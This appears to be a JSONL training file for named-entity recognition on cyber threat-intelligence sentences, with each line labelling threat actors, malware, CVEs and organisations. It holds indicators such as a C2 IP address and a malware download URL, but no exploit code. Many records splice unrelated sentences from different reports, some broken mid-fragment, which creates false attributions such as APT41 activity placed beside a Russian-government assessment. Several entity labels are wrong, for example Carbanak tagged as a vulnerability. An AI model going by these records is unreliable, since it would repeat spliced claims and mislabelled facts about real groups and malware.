{"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": {"THREAT_ACTOR: PLATINUM": [[32, 40]], "TOOL: AMT Technology SDK": [[77, 95]], "TOOL: Redirection Library API": [[99, 122]], "MALWARE: imrsdk.dll": [[125, 135]], "TOOL: C2": [[242, 244]], "ORGANIZATION: Microsoft": [[308, 317]], "VULNERABILITY: CVE-2017-11882": [[379, 393]]}, "info": {"id": "cyberner_stix_train_000565", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . TG-3390 actors have used Java exploits in their SWCs .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: Microsoft Office exploits": [[37, 62]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[110, 137]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[140, 167]], "THREAT_ACTOR: TG-3390": [[170, 177]], "TOOL: Java": [[195, 199]], "MALWARE: SWCs": [[218, 222]]}, "info": {"id": "cyberner_stix_train_000566", "source": "cyberner_stix_train"}}
{"text": "this instance ) from the launcher view on their device , as shown in Figure 3 below . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": {"ORGANIZATION: telecom companies": [[95, 112]], "THREAT_ACTOR: APT41": [[245, 250]], "ORGANIZATION: CTU": [[262, 265]], "ORGANIZATION: Russian government": [[413, 431]]}, "info": {"id": "cyberner_stix_train_000567", "source": "cyberner_stix_train"}}
{"text": "However , the security of these stores and the apps they sell aren ’ t always verified . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . is always even . The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": {"TOOL: WHITEOUT": [[136, 144]], "TOOL: Contopee": [[151, 159]], "THREAT_ACTOR: APT38": [[186, 191]], "ORGANIZATION: bank": [[249, 253]]}, "info": {"id": "cyberner_stix_train_000568", "source": "cyberner_stix_train"}}
{"text": "Figure 4 . In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military . ESET telemetry shows victims are mostly located in Asia , with Thailand having the largest part of the pie . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"TOOL: Emissary": [[25, 33]], "ORGANIZATION: government": [[165, 175]], "ORGANIZATION: military": [[179, 187]], "ORGANIZATION: ESET": [[190, 194]], "ORGANIZATION: Talos": [[422, 427]], "ORGANIZATION: Open Babel": [[493, 503]]}, "info": {"id": "cyberner_stix_train_000569", "source": "cyberner_stix_train"}}
{"text": "] net The overlaps between the Henbox , PlugX , Zupdax , and Poison Ivy malware families involves a web of shared C2s and IP resolutions centered around the below : 59.188.196 [ . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": {"MALWARE: Henbox": [[31, 37]], "MALWARE: PlugX": [[40, 45]], "MALWARE: Zupdax": [[48, 54]], "MALWARE: Poison Ivy": [[61, 71]], "THREAT_ACTOR: APT41": [[180, 185]], "THREAT_ACTOR: Dukes group": [[360, 371]], "MALWARE: CosmicDuke": [[497, 507]]}, "info": {"id": "cyberner_stix_train_000570", "source": "cyberner_stix_train"}}
{"text": "In addition , Dell analysts have assessed with high-confidence these activities are attributable to Iranian state-sponsored activities .", "spans": {"ORGANIZATION: Dell": [[14, 18]]}, "info": {"id": "cyberner_stix_train_000571", "source": "cyberner_stix_train"}}
{"text": "The stealer searches for files 60mb and less with these extensions : .doc , .docx , .xls , .xlsx , .ppt , .pptx , .exe , .zip , .rar .", "spans": {"FILEPATH: .doc": [[69, 73]], "FILEPATH: .docx": [[76, 81]], "FILEPATH: .xls": [[84, 88]], "FILEPATH: .xlsx": [[91, 96]], "FILEPATH: .ppt": [[99, 103]], "FILEPATH: .pptx": [[106, 111]], "FILEPATH: .exe": [[114, 118]], "FILEPATH: .zip": [[121, 125]], "FILEPATH: .rar": [[128, 132]]}, "info": {"id": "cyberner_stix_train_000572", "source": "cyberner_stix_train"}}
{"text": "We needed to do this to understand the techniques FinFisher uses to compromise and persist on a machine , and to validate the effectiveness of Office 365 ATP detonation sandbox , Windows Defender Advanced Threat Protection ( Windows Defender ATP ) generic detections , and other Microsoft security solutions . APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises . The data is XOR encrypted with the key “ *&b0i0rong2Y7un1 ” and base64-encoded . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": {"MALWARE: FinFisher": [[50, 59]], "SYSTEM: Office 365 ATP": [[143, 157]], "SYSTEM: Windows Defender Advanced Threat Protection": [[179, 222]], "SYSTEM: Windows Defender ATP": [[225, 245]], "ORGANIZATION: Microsoft": [[279, 288]], "THREAT_ACTOR: APT40": [[310, 315]], "TOOL: XOR": [[546, 549]], "ORGANIZATION: CrowdStrike": [[630, 641]], "VULNERABILITY: CVE-2022 - 41040": [[725, 741]]}, "info": {"id": "cyberner_stix_train_000573", "source": "cyberner_stix_train"}}
{"text": "But some clues , such as the existence of a hidden menu for operator control , point to a manual installation method – the attackers used physical access to a victim ’ s device to install the malware . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89.34.237.118 808 http://89.34.237.118:808/Rar32.exe . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[247, 266]], "TOOL: FALLCHILL malware": [[290, 307]], "ORGANIZATION: aerospace": [[333, 342]], "ORGANIZATION: telecommunications": [[345, 363]], "ORGANIZATION: finance industries": [[370, 388]], "TOOL: WinRAR": [[508, 514]], "IP_ADDRESS: 89.34.237.118 808": [[517, 534]], "URL: http://89.34.237.118:808/Rar32.exe": [[535, 569]], "MALWARE: fake / rogue anti - virus products": [[664, 698]]}, "info": {"id": "cyberner_stix_train_000574", "source": "cyberner_stix_train"}}
{"text": "Infecting legal web resources help spread mobile malware via popular websites . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network . Furthermore , the encrypted payload is neither embedded in the overlay nor located in a COM1:NULL.dat alternate data stream . If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": {"ORGANIZATION: CTU": [[113, 116]], "TOOL: PIEHOP": [[407, 413]]}, "info": {"id": "cyberner_stix_train_000575", "source": "cyberner_stix_train"}}
{"text": "Ultimately , the epistemic foundation of the behavior-based naming approach makes this irrelevant for tracking ( and labeling for convenience sake ) observations .", "spans": {}, "info": {"id": "cyberner_stix_train_000576", "source": "cyberner_stix_train"}}
{"text": "OCTOBER 2014 THROUGH SEPTEMBER 2015 , FireEye iSight Intelligence identified changes made to domain name server ( DNS ) records that suggest that APT28 intercepted email traffic from the Kyrgyzstan Ministry of Foreign Affairs after maliciously modifying DNS records of the ministry ’s authoritative DNS servers .", "spans": {"ORGANIZATION: FireEye": [[38, 45]], "THREAT_ACTOR: APT28": [[146, 151]], "TOOL: email": [[164, 169]], "ORGANIZATION: Kyrgyzstan Ministry of Foreign Affairs": [[187, 225]]}, "info": {"id": "cyberner_stix_train_000577", "source": "cyberner_stix_train"}}
{"text": "PVE Find AD User — This command-line tool identifies login locations of Active Directory ( AD ) users .", "spans": {"TOOL: PVE Find AD User": [[0, 16]], "TOOL: Active Directory": [[72, 88]], "TOOL: AD": [[91, 93]]}, "info": {"id": "cyberner_stix_train_000578", "source": "cyberner_stix_train"}}
{"text": "All of these methods attempt to space out the introduction of possible signals in various stages , testing for gaps in the publication process . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . Sending the help command for each , you can see the extra features added between version 3.1 and 3.2 . The “ ExecStart ” value specifies the path of the program to be run , which in this case was GOGETTER .", "spans": {"ORGANIZATION: technology": [[399, 409]], "TOOL: GOGETTER": [[679, 687]]}, "info": {"id": "cyberner_stix_train_000579", "source": "cyberner_stix_train"}}
{"text": "If the malware determines that is not running on an emulator , it then performs additional checks to ensure that it wo n't be detected . We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers – all operated on CHINANET , and hosted in Guangdong Province . ShadowHammer : HEUR : Trojan.Win32.ShadowHammer.gen . The first step is the previously unknown OWA exploit technique .", "spans": {"THREAT_ACTOR: Moafee": [[149, 155]], "TOOL: HTRAN": [[164, 169]], "THREAT_ACTOR: ShadowHammer": [[295, 307]], "MALWARE: HEUR": [[310, 314]], "MALWARE: Trojan.Win32.ShadowHammer.gen": [[317, 346]]}, "info": {"id": "cyberner_stix_train_000580", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . specifically CVE-2018-0798 , before downloading subsequent payloads .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "VULNERABILITY: CVE-2018-0798": [[212, 225]]}, "info": {"id": "cyberner_stix_train_000581", "source": "cyberner_stix_train"}}
{"text": "This recurring , blindingly-fast Sofacy attack attracted our attention as neither sample was delivered through a zero-day vulnerability — instead , they appeared to be downloaded and installed by another malware .", "spans": {"THREAT_ACTOR: Sofacy": [[33, 39]], "VULNERABILITY: zero-day": [[113, 121]]}, "info": {"id": "cyberner_stix_train_000582", "source": "cyberner_stix_train"}}
{"text": "On installation , the app requests the user to provide SMS storage access and high Android privileges such as Device Admin . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries . So much so that Microsoft did a takedown in 2012 . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": {"SYSTEM: Android": [[83, 90]], "ORGANIZATION: privatized agencies": [[152, 171]], "ORGANIZATION: government contractors": [[176, 198]], "ORGANIZATION: enterprises": [[210, 221]], "ORGANIZATION: consumer electronics": [[229, 249]], "ORGANIZATION: computer": [[252, 260]], "ORGANIZATION: healthcare": [[263, 273]], "ORGANIZATION: financial industries": [[280, 300]], "ORGANIZATION: Microsoft": [[319, 328]]}, "info": {"id": "cyberner_stix_train_000583", "source": "cyberner_stix_train"}}
{"text": "After installation , the malware connects to the designated Command and Control ( C & C ) server , and receives a command to perform . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": {"VULNERABILITY: Carbanak": [[135, 143]], "TOOL: Carberp": [[186, 193]], "THREAT_ACTOR: espionage": [[211, 220]], "THREAT_ACTOR: Suckfly": [[314, 321]], "SYSTEM: Windows": [[395, 402]], "MALWARE: Nidiran back door": [[483, 500]]}, "info": {"id": "cyberner_stix_train_000584", "source": "cyberner_stix_train"}}
{"text": "Potentially malicious iOS connection Using the codes and “ Concipit1248 ” to check for more versions , we found two other apps in the App Store . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware . the following microcode graph shows edi is assigned to esi ( the block comparison variable in this case ) Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"SYSTEM: iOS": [[22, 25]], "SYSTEM: App Store": [[134, 143]], "ORGANIZATION: financial institutions": [[218, 240]], "TOOL: Metel malware": [[298, 311]], "MALWARE: Rhysida": [[420, 427]]}, "info": {"id": "cyberner_stix_train_000585", "source": "cyberner_stix_train"}}
{"text": "The packet is serialized into a stream of bytes .", "spans": {}, "info": {"id": "cyberner_stix_train_000586", "source": "cyberner_stix_train"}}
{"text": "When analyzing the Ginp ’ s recent samples , ThreatFabric analysts found some similarities with the famous Android banking Trojan . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . It turned out that the DLL files we found are a custom variant of Gh0st RAT , and the EXE files download the RAT .", "spans": {"MALWARE: Ginp": [[19, 23]], "SYSTEM: ThreatFabric": [[45, 57]], "MALWARE: configuration file": [[136, 154]], "TOOL: DLL": [[269, 272]], "MALWARE: Gh0st RAT": [[312, 321]]}, "info": {"id": "cyberner_stix_train_000587", "source": "cyberner_stix_train"}}
{"text": "The certificates are only as secure as the safeguards that organizations put around them .", "spans": {}, "info": {"id": "cyberner_stix_train_000588", "source": "cyberner_stix_train"}}
{"text": "Once installed , the application requests permissions so that it may control SMS messages and steal sensitive data on the device , as well as proliferate to other devices in the target device ’ s contact list . These RAT families are discussed in Novetta’s other report on the Lazarus Group’s RAT and Staging capabilities . The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect .", "spans": {"ORGANIZATION: Novetta’s": [[247, 256]], "THREAT_ACTOR: Lazarus": [[277, 284]], "THREAT_ACTOR: Gallmaker": [[338, 347]], "MALWARE: LotL": [[379, 383]], "MALWARE: publicly available hack tools": [[396, 425]]}, "info": {"id": "cyberner_stix_train_000589", "source": "cyberner_stix_train"}}
{"text": "( It is specified in the interception template whether a reply must be sent , and which text should be sent to which address . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"TOOL: Equation Editor": [[163, 178]], "MALWARE: EQNEDT32.EXE": [[181, 193]], "ORGANIZATION: CTU": [[309, 312]], "THREAT_ACTOR: Lazarus Group": [[383, 396]], "ORGANIZATION: cryptocurrency company": [[516, 538]]}, "info": {"id": "cyberner_stix_train_000590", "source": "cyberner_stix_train"}}
{"text": "Four files tested in 2014 are based on the open-source project , cryptcat .", "spans": {}, "info": {"id": "cyberner_stix_train_000591", "source": "cyberner_stix_train"}}
{"text": "Release_Time : 2015-05-28", "spans": {}, "info": {"id": "cyberner_stix_train_000592", "source": "cyberner_stix_train"}}
{"text": "Apps that have this permission can draw a window that belongs to the system group and can ’ t be dismissed . Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan . Additionally there is a known issue with the result ( e.g , the remaining loop or paradoxical decompiled code ) With regards to these similarities , we highlight the following trends which could manifest in future OT malware : •", "spans": {"ORGANIZATION: Unit 42": [[141, 148]], "ORGANIZATION: government agencies": [[232, 251]], "MALWARE: OT malware": [[490, 500]]}, "info": {"id": "cyberner_stix_train_000593", "source": "cyberner_stix_train"}}
{"text": "We have also found a Russian-language error message in many PinchDuke samples which translates as , “ There is an error in the module ’s name ! The length of the data section name must be 4 bytes! ” Additionally , Kaspersky noted that based on the compilation timestamps , the authors of the Duke malware appear to primarily work from Monday to Friday between the times of 6am and 4pm UTC+0 .", "spans": {"MALWARE: PinchDuke": [[60, 69]], "ORGANIZATION: Kaspersky": [[214, 223]], "THREAT_ACTOR: Duke": [[292, 296]]}, "info": {"id": "cyberner_stix_train_000594", "source": "cyberner_stix_train"}}
{"text": "Beginning within the data field , all contents of the FLV stream become 0xEE .", "spans": {"TOOL: FLV": [[54, 57]]}, "info": {"id": "cyberner_stix_train_000595", "source": "cyberner_stix_train"}}
{"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks .", "spans": {"VULNERABILITY: Rocke group exploits vulnerabilities": [[52, 88]]}, "info": {"id": "cyberner_stix_train_000596", "source": "cyberner_stix_train"}}
{"text": "At this stage , half the job is done for the malware . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor . , It allows security researchers to analyze the source code and understand the attacker ’s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[55, 86]], "TOOL: SYSCON backdoor": [[257, 272]]}, "info": {"id": "cyberner_stix_train_000597", "source": "cyberner_stix_train"}}
{"text": "This organization was formerly known as the East Turkestan Islamic Party and is purported to be an Islamic extremist separatist organization founded by Uyghur jihadists . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government .", "spans": {"ORGANIZATION: East Turkestan Islamic Party": [[44, 72]], "THREAT_ACTOR: APT41": [[233, 238]], "THREAT_ACTOR: APT28": [[431, 436]], "ORGANIZATION: Russian government": [[519, 537]]}, "info": {"id": "cyberner_stix_train_000598", "source": "cyberner_stix_train"}}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": {"ORGANIZATION: Unit 42": [[29, 36]], "MALWARE: EPS files": [[109, 118]], "VULNERABILITY: CVE-2015-2545": [[133, 146]], "VULNERABILITY: CVE-2017-0261": [[151, 164]], "THREAT_ACTOR: Leafminer": [[187, 196]], "THREAT_ACTOR: operators": [[197, 206]], "VULNERABILITY: EternalBlue": [[211, 222]]}, "info": {"id": "cyberner_stix_train_000599", "source": "cyberner_stix_train"}}
{"text": "OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . The infection vector is a spear-phishing email with a malicious attachment .", "spans": {"THREAT_ACTOR: OurMine": [[0, 7]], "ORGANIZATION: WikiLeaks'": [[38, 48]], "ORGANIZATION: Twitter": [[100, 107], [164, 171]], "ORGANIZATION: Pinterest": [[176, 185]], "ORGANIZATION: BuzzFeed": [[215, 223]], "ORGANIZATION: TechCrunch": [[228, 238]]}, "info": {"id": "cyberner_stix_train_000600", "source": "cyberner_stix_train"}}
{"text": "Based on observations associated with the malicious document , we observed subsequent shell sessions probably associated with Metasploit B-MAL S-TOOL ’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files : ntertmgr32.exe , ntertmgr64.exe and vdsk911.sys .", "spans": {"FILEPATH: ntertmgr32.exe": [[275, 289]], "FILEPATH: ntertmgr64.exe": [[292, 306]], "FILEPATH: vdsk911.sys": [[311, 322]]}, "info": {"id": "cyberner_stix_train_000601", "source": "cyberner_stix_train"}}
{"text": "Even now , this is still not enough . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan . The unzIP . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"TOOL: financial Trojan": [[134, 150]], "TOOL: unzIP": [[157, 162]], "SYSTEM: WebDav server": [[279, 292]], "MALWARE: NetSupport RAT": [[304, 318]]}, "info": {"id": "cyberner_stix_train_000602", "source": "cyberner_stix_train"}}
{"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": {"VULNERABILITY: CVE-2013-0640": [[64, 77]], "MALWARE: MiniDuke": [[88, 96]], "VULNERABILITY: zero-day": [[150, 158]]}, "info": {"id": "cyberner_stix_train_000603", "source": "cyberner_stix_train"}}
{"text": "Malware data leak When we analyzed the sample , we realized that the malware operators left the remote database with some of the victims ’ data freely accessible , without any authentication . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering .", "spans": {"THREAT_ACTOR: TA505": [[254, 259]], "TOOL: emails": [[454, 460]]}, "info": {"id": "cyberner_stix_train_000604", "source": "cyberner_stix_train"}}
{"text": "Once the HenBox app is installed and launched , it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background , and to satisfy the victim with the app they were requesting , assuming they requested to download a particular app , such as DroidVPN . By 2014 , the Winnti malware code was no longer limited to game manufacturers . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries .", "spans": {"MALWARE: HenBox": [[9, 15]], "SYSTEM: DroidVPN": [[295, 303]], "THREAT_ACTOR: Winnti": [[320, 326]], "ORGANIZATION: game manufacturers": [[365, 383]], "THREAT_ACTOR: APT16": [[471, 476]], "ORGANIZATION: high-tech": [[551, 560]], "ORGANIZATION: government services": [[563, 582]], "ORGANIZATION: media": [[585, 590]], "ORGANIZATION: financial services industries": [[595, 624]]}, "info": {"id": "cyberner_stix_train_000605", "source": "cyberner_stix_train"}}
{"text": "After that , it carries out the malware operator ’s commands in order to install the next stage permanent payload .", "spans": {}, "info": {"id": "cyberner_stix_train_000606", "source": "cyberner_stix_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "FILEPATH: date string hardcoded": [[97, 118]], "MALWARE: Bookworm sample": [[129, 144]]}, "info": {"id": "cyberner_stix_train_000607", "source": "cyberner_stix_train"}}
{"text": "The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . We successfully unpacked the initial sample we found dropped by the UPX unpacker .", "spans": {"TOOL: UPX unpacker": [[228, 240]]}, "info": {"id": "cyberner_stix_train_000608", "source": "cyberner_stix_train"}}
{"text": "The only active target list observed in the wild is available in the appendix and contains a total of 30 unique targets . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"THREAT_ACTOR: SectorJ04": [[148, 157]], "THREAT_ACTOR: BRONZE BUTLER": [[257, 270]], "VULNERABILITY: zero-day": [[326, 334]]}, "info": {"id": "cyberner_stix_train_000609", "source": "cyberner_stix_train"}}
{"text": "delivery : to deliver specified text to all victim ’ s contacts ( SMS worming ) . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives . This particular RAT attempts to target a very specific set of Arabic-speaking countries . Change it Up in 2023 Get Ahead of Known Vulnerabilities", "spans": {"THREAT_ACTOR: cyber espionage threat group": [[145, 173]], "THREAT_ACTOR: APT34": [[196, 201]], "TOOL: custom PowerShell backdoor": [[212, 238]], "TOOL: RAT": [[283, 286]]}, "info": {"id": "cyberner_stix_train_000610", "source": "cyberner_stix_train"}}
{"text": "The other is a custom utility which , despite its large size , has limited functionality and acts as a tunnel , possibly used by the attackers to maintain persistence within the compromised network .", "spans": {}, "info": {"id": "cyberner_stix_train_000611", "source": "cyberner_stix_train"}}
{"text": "Unit 42 and others have shown in the first half of 2018 how this threat actor group continues to target multiple organizations throughout the world with a strong emphasis on government , diplomatic and other strategic organizations primarily in North America and Europe .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]]}, "info": {"id": "cyberner_stix_train_000612", "source": "cyberner_stix_train"}}
{"text": "Handover from initial module to the main payload As mentioned , the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . Among these 5 tools, only WinZip and Windows’ unzIP S-TOOL were not able to extract anything from the ZIP file as they encountered an error at the start of the extraction . The hacking and defacement of a U.S. Government system in which the attackers post messages disparaging remarks about capitalism or democracy would be a solid example of hacktivism .", "spans": {"THREAT_ACTOR: group": [[228, 233]], "THREAT_ACTOR: Vixen Panda": [[238, 249]], "THREAT_ACTOR: Ke3chang": [[252, 260]], "THREAT_ACTOR: Royal APT": [[263, 272]], "THREAT_ACTOR: Playful Dragon": [[279, 293]], "TOOL: WinZip": [[322, 328]], "TOOL: unzIP S-TOOL": [[342, 354]], "ORGANIZATION: U.S. Government system": [[501, 523]], "THREAT_ACTOR: attackers": [[537, 546]]}, "info": {"id": "cyberner_stix_train_000613", "source": "cyberner_stix_train"}}
{"text": "The Trick , also known as Trickbot , is another banking Trojan that TA505 first began distributing in June of 2017 , although we have observed The Trick in the wild since fall 2016 , usually in regionally targeted campaigns .", "spans": {"MALWARE: Trick": [[4, 9], [147, 152]], "MALWARE: Trickbot": [[26, 34]], "MALWARE: Trojan": [[56, 62]], "THREAT_ACTOR: TA505": [[68, 73]]}, "info": {"id": "cyberner_stix_train_000614", "source": "cyberner_stix_train"}}
{"text": "It mainly targets Chinese users , but has also successfully affected people and organizations in the United States , United Kingdom , Thailand , Spain , and Ireland . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea .", "spans": {"MALWARE: Okrum": [[219, 224]], "THREAT_ACTOR: Lazarus Group": [[451, 464]]}, "info": {"id": "cyberner_stix_train_000615", "source": "cyberner_stix_train"}}
{"text": "backdoor , Sednit , Seduploader , JHUHUGIT , Sofacy .", "spans": {"MALWARE: Sednit": [[11, 17]], "MALWARE: Seduploader": [[20, 31]], "MALWARE: JHUHUGIT": [[34, 42]], "MALWARE: Sofacy": [[45, 51]]}, "info": {"id": "cyberner_stix_train_000616", "source": "cyberner_stix_train"}}
{"text": "This trend continued until late September 2017 , when we saw Magnitude EK focus primarily on the APAC region , with a large chunk targeting South Korea . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"TOOL: Magnitude EK": [[61, 73]], "THREAT_ACTOR: groups": [[160, 166]], "THREAT_ACTOR: attackers": [[189, 198]], "THREAT_ACTOR: Rocket Kitten": [[209, 222]], "ORGANIZATION: anonymous proxy users": [[283, 304]], "ORGANIZATION: researchers": [[307, 318]], "ORGANIZATION: journalists": [[321, 332]], "ORGANIZATION: dissidents": [[339, 349]]}, "info": {"id": "cyberner_stix_train_000617", "source": "cyberner_stix_train"}}
{"text": "With our interest piqued , we pivoted on the import hashes ( also known as an imphash ) , which captures the import table of a given file .", "spans": {}, "info": {"id": "cyberner_stix_train_000618", "source": "cyberner_stix_train"}}
{"text": "Attempts to sign malware with code-signing certificates have become more common as the Internet and security systems have moved towards a more trust and reputation oriented model .", "spans": {}, "info": {"id": "cyberner_stix_train_000619", "source": "cyberner_stix_train"}}
{"text": "There was no open-source footprint for the remaining 42 addresses , suggesting that TG-4127 acquired them from another source , possibly other intelligence activity .", "spans": {"THREAT_ACTOR: TG-4127": [[84, 91]]}, "info": {"id": "cyberner_stix_train_000620", "source": "cyberner_stix_train"}}
{"text": "Read more about Dragos ’ approach to categorizing threat activity and attribution .", "spans": {"ORGANIZATION: Dragos": [[16, 22]]}, "info": {"id": "cyberner_stix_train_000621", "source": "cyberner_stix_train"}}
{"text": "Svpeng In mid-July , we detected Trojan-SMS.AndroidOS.Svpeng.a which , unlike its SMS Trojan counterparts , is focused on stealing money from the victiim ’ s bank account rather than from his mobile phone . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan . The Winnti Group is still actively using one of its flagship backdoors , ShadowPad , this time against Hong Kong universities . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"MALWARE: Svpeng": [[0, 6]], "MALWARE: Trojan-SMS.AndroidOS.Svpeng.a": [[33, 62]], "THREAT_ACTOR: Tropic Trooper": [[282, 296]], "ORGANIZATION: government institutions": [[314, 337]], "ORGANIZATION: energy industry": [[351, 366]], "THREAT_ACTOR: Winnti Group": [[383, 395]], "MALWARE: backdoors": [[440, 449]], "MALWARE: ShadowPad": [[452, 461]], "ORGANIZATION: CrowdStrike Services": [[545, 565]], "THREAT_ACTOR: Play ransomware intrusions": [[594, 620]], "TOOL: Microsoft Exchange": [[671, 689]]}, "info": {"id": "cyberner_stix_train_000622", "source": "cyberner_stix_train"}}
